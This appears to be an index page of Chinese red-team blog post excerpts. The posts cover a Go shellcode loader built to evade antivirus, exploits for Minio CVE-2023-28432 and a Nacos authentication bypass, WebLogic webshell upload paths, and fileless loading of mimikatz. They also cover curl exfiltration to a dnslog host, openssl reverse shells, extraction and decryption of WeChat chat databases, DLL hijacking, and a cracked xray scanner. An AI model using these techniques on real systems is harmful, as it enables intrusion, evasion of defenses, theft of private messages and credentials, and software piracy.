免杀技术-go shellcode加载bypassAV
go shellcode加载 bypass AV
在攻防实战中免杀技术尤为重要,站在巨人的肩膀上学习go shellcode免杀加载的方法
相关代码打包至github https://github.com/Pizz33/GobypassAV-shellcode
免杀效果预览:
编写一个加载器需要围绕3个基本的功能实现:
申请内存空间:VirtualAlloc、VirtualAlloc2、VirtualAllocEx
导入内存:RtlCopyMemory、RtlCopyBytes、RtlMoveMemory
调用执行:创建线程的方式执行、用syscall调用执行、内嵌C代码执行
内存空间申请VirtualAlloc
1234567VirtualAlloc:在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态(分配的内存初始化为零)SWAPMem, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x1000|0x2000, 0x40)//0:开始内存地址//uintptr(len(shellcode)):申请内存长 ...
漏洞复现-Minio信息泄露漏洞(CVE-2023-28432)
Minio信息泄露漏洞(CVE-2023-28432)12345678910POST /minio/bootstrap/v1/verify HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 0
批量检测脚本
123456 ...
漏洞复现-Nacos身份认证绕过
Nacos身份认证绕过由于secret.key值为默认
12345### The default token(Base64 String):nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789### 2.1.0 版本后nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
可使用 https://jwt.io/#debugger-io 生成可用的token
如果需要登录至nacos,输入任意账密进行抓包
把回显包替换为下面这个
123456789101112HTTP/1.1 200Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY ...
软件破解-xray1.9.4破解
xray1.9.4破解
jl修改为jnl,点击补丁保存
红队技术-weblogic上传getshell路径
weblogic上传getshell路径Linux系统第一种上传目录
123/u01/oracle/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/u01/oracle/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images
访问路径
1http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp
第二种上传目录
1/u01/domains/osb/servers/AdminServer/tmp/_WL_internal/uddiexplorer/随机字符/war/666.jsp
访问路径
1http://xxxx/uddiexplorer/shell.jsp
第三种上传目录
1/Oracle/Middleware/user_projects/domains/application/servers/AdminServer/ ...
免杀技术-FilelessPELoader免杀加载
FilelessPELoader免杀加载分享一个好用的PE远程加载项目
https://github.com/TheD1rkMtr/FilelessPELoader
远程内存加载,免杀大部分的杀软
1、首先安装相关python库
1pip install pycryptodome
2、使用aes.py生成两个bin文件,分别为cipher.bin和key.bin
1python aes.py mimikatz.exe
3、使用python开启web服务,
123python -m http.server 80python -m SimpleHTTPServer 8080
4、使用编译好的程序进行远程加载
12FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key>
同样可以免杀cs上线,测试可以免杀360、火绒、def、eset
日常技巧-命令无回显实战Tips
dnslog获取完整请求大多数dnslog平台外带数据会发现不能获取全部内容
https://log.xn--9tr.com/
改用以下地址,但是中文会出现乱码
https://www.log.d48e48337471993e.com/
或者使用burp自带的dnslog,但是流量告警十分明显
写入文件读取内容1ls -l > aaa.txt; curl -d @aaa.txt http://dnslog地址
实战利用判断是否出网
出网的情况存在HTTP请求出网的情况可以尝试反弹shell
https://weibell.github.io/reverse-shell-generator/#
如果被流量设备拦截,可以尝试改用openssl反弹shell
VPS上运行
123openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes一直输入回车生成即可openssl s_server -quiet -key key.pem -cert cert.pem -por ...
红队技术-上线机器微信聊天记录提取
微信聊天记录提取https://github.com/AdminTest0/SharpWxDump
版本 < 3.7.0.30 只运行不登录能获取个人信息,登录后可以获取数据库密钥
版本 > 3.7.0.30 只运行不登录不能获取个人信息,登录后都能获取
利用前提:新版本微信需要处于登录状态
项目需要使用x86进行编译
运行程序后会生成wechatkey,之后解密可以用上
到此目录下载DB文件,拖到本地进行解密
1C:\Users\用户名\Documents\WeChat Files\wxid_xxxxxxx\Msg\Multi
解密脚本
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849from Crypto.Cipher import AESimport hashlib, hmac, ctypes, sys, getoptSQLITE_FILE_HEADER = bytes('SQLite format 3', ...
技术研究-从零开始学习DLL劫持
DLL劫持DLL简介
在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件,一个DLL文件也可能被不同的应用程序使用,这样的DLL文件被称为共享DLL文件。
DLL加载顺序如果程序需要加载一个相对路径的dll文件,它将从当前目录下尝试查找,如果找不到,则按照如下顺序寻找:
windows xp sp2之前Windows查找DLL的目录以及对应的顺序:
进程对应的应用程序所在目录;
当前目录(Current Directory);
系统目录(通过 GetSystemDirectory 获取);
16位系统目录;
Windows目录(通过 GetWindowsDirectory 获取);
PATH环境变量中的各个目录;
windows xp sp2之后Windows查找DLL的目录以及对应的顺序(SafeDllSearchMode 默认会被开启):
默认注册表为:HKEY_LOCAL_MACHINE\System\C ...
渗透测试-Ueditor漏洞捡漏
Ueditor漏洞捡漏到github上下载
https://github.com/fex-team/ueditor
下载完成后把压缩包解压后重命名为ueditor,新建一个目录,把 ueditor 放到 test 文件夹下
把net目录转化为应用程序
运行过程报错
修改 web.config,添加 <customErrors mode="Off"/>
修改完成后继续出现报错
在C:\windows\temp这个文件夹添加network service用户的权限即可解决
搭建完成
访问首页,会出现如图403的页面
常规的目录扫描
访问login.html为简单的登陆页面,这个点是用来混淆视线的,直接跳过
但我们可以看到目录扫描ueditor下存在以下页面,可以联想到ueditor getshell
1/ueditor/net/controller.ashx?action=
准备一个aspx木马,重命名为png,并放置到VPS上,在该目录下开启http服务
1python -m SimpleHTTPServer 8080
构造上 ...








